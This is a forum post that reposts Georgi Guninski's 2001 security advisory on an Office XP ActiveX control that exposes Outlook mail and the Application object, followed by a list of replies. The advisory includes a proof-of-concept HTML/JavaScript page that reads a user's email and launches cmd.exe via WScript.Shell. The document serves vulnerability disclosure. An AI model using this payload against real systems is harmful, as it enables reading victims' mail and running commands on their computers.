Клубове Дир.бг
powered by diri.bg
търси в Клубове diri.bg Разширено търсене

Вход
Име
Парола

Клубове
Dir.bg
Взаимопомощ
Горещи теми
Компютри и Интернет
Контакти
Култура и изкуство
Мнения
Наука
Политика, Свят
Спорт
Техника
Градове
Религия и мистика
Фен клубове
Хоби, Развлечения
Общества
Я, архивите са живи
Клубове Дирене Регистрация Кой е тук Въпроси Списък Купувам / Продавам 14:27 25.04.24 
Клубове/ Компютри и Интернет / Доставчици на Интернет Пълен преглед*
Информация за клуба
Тема Georgi Guninski!
Автор вeни мapkoвckи (др.)
Публикувано07.08.01 16:59  



Georgi Guninski security advisory #49, 2001


MS Office XP - the more money I give to Microsoft, the more vulnerable my Windows computers are


Systems affected:
Win2K + IE 5.5 SP1 fully patched + Office XP.
It was reported to work with IE6 beta also.


Risk: High
Date: 12 July 2001


Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission.


Disclaimer:
The information in this advisory is believed to be true based on
experiments though it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.


If you want to link to this advisory or reference it use the URL:
http://www.guninski.com/vv2xp.html
The above especially applies for companies like Mitre and BugNet


Background:


Recently I bought Office XP.
It was quite unpleasant feeling giving so much money for so buggy
product.


Description:


If a user visits a specially designed html page with IE or opens or
previews a message with Outlook XP arbitrary commands may be
executed on his computer. This may lead to taking full control over
user's computer.
Using another approach to this bug allows reading, modifying and deleting
messages in user's Outlook XP folders.



Details:
The problem is again ActiveX. This time Office XP seems to install a
malicous ActiveX control - "Microsoft Outlook View Control".
This control exposes property named "selection" which gives access to user's
mail messages. It also exposes the Outlook "Application" object which may lead
to execution of arbitrary programs of the user's computer.
Examine the script below for more information


Demonstration:
http://www.guninski.com/vv3-2demo.html
-----------------------------------------------------
This assumes you have at least one message in Outlook XP's Inbox


<object id="o1"
classid="clsid:0006F063-0000-0000-C000-000000000046"
>
<param name="folder" value="Inbox">
</object>


<script>
function f()
{
//alert(o2.object);
sel=o1.object.selection;
vv1=sel.Item(1);
alert("Subject="+vv1.Subject);
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
alert("May be deleted");
//vv1.Delete();


vv2=vv1.Session.Application.CreateObject("WScript.Shell");


alert("Much more fun is possible");



vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ ");


}
setTimeout("f()",2000);
</script>
-----------------------------------------------------



Solution:
Uninstall Office XP and Windows.


Vendor status:
Microsoft was informed on 9 July 2001.
As far I could understand they are still investigating my report.



Regards,
Georgi Guninski
http://www.guninski.com

Вени Марковски


Цялата тема
ТемаАвторПубликувано
* Georgi Guninski! вeни мapkoвckи   07.08.01 16:59
. * Re: Georgi Guninski! RinseWind   09.08.01 00:11
. * Re: Georgi Guninski! Димитъp Гaнчeв   09.08.01 00:29
. * Re: Georgi Guninski! Mилko Гeoprиeв   09.08.01 09:31
. * open source или open mind Димитъp Гaнчeв   09.08.01 11:32
. * министърът на ДА вeни мapkoвckи   09.08.01 11:43
. * Re: министърът на ДА Goose   10.08.01 20:05
. * Re: министърът на ДА Primer   10.08.01 20:30
. * Re: министърът на ДА curly   11.08.01 17:49
. * Re: open source или open mind rabotil i s *nix   11.08.01 23:13
. * Re: open source или open mind нekoй   11.08.01 23:19
. * Re: open source или open mind Selskiq ldiot   12.08.01 10:05
. * Re: open source или open mind няkoй   12.08.01 19:34
. * Re: open source или open mind Selskiq ldiot   13.08.01 04:43
. * Re: open source или open mind вoeнeн   13.08.01 06:55
. * срещи вeни мapkoвckи   13.08.01 09:12
. * Bulgarski kazan Kazanov   12.08.01 23:09
. * Re: Bulgarski kazan вeни мapkoвckи   13.08.01 09:09
. * В подкрепа на Д.Ганчев iwanttobelieve   14.08.01 14:27
. * Re: В подкрепа на Д.Ганчев Ceлckия идиoт   14.08.01 15:00
. * Re: В подкрепа на Д.Ганчев няkoй   14.08.01 23:33
. * Re: Georgi Guninski! irrelevant   09.08.01 12:50
. * цитатите вeни мapkoвckи   09.08.01 12:54
. * Re: цитатите DAMON   11.08.01 00:41
. * Re: цитатите вeни мapkoвckи   13.08.01 09:22
. * Re: Open source software Cтaнчo Гopckия   15.08.01 16:07
. * Re: Open source software Ceлckия Идиoт   15.08.01 16:13
. * Re: Open source software Cтaнчo Гopckия   15.08.01 16:32
. * Re: Open source software вeни мapkoвckи   15.08.01 16:55
. * Re: Open source software Ceлckия Идиoт   15.08.01 17:38
. * за селския идиот няkoй   17.08.01 07:07
. * Re: за селския идиот Selskiq ldiot   17.08.01 22:05
. * Re: Open source software вeни мapkoвckи   15.08.01 16:44
Клуб :  


Clubs.dir.bg е форум за дискусии. Dir.bg не носи отговорност за съдържанието и достоверността на публикуваните в дискусиите материали.

Никаква част от съдържанието на тази страница не може да бъде репродуцирана, записвана или предавана под каквато и да е форма или по какъвто и да е повод без писменото съгласие на Dir.bg
За Забележки, коментари и предложения ползвайте формата за Обратна връзка | Мобилна версия | Потребителско споразумение
© 2006-2024 Dir.bg Всички права запазени.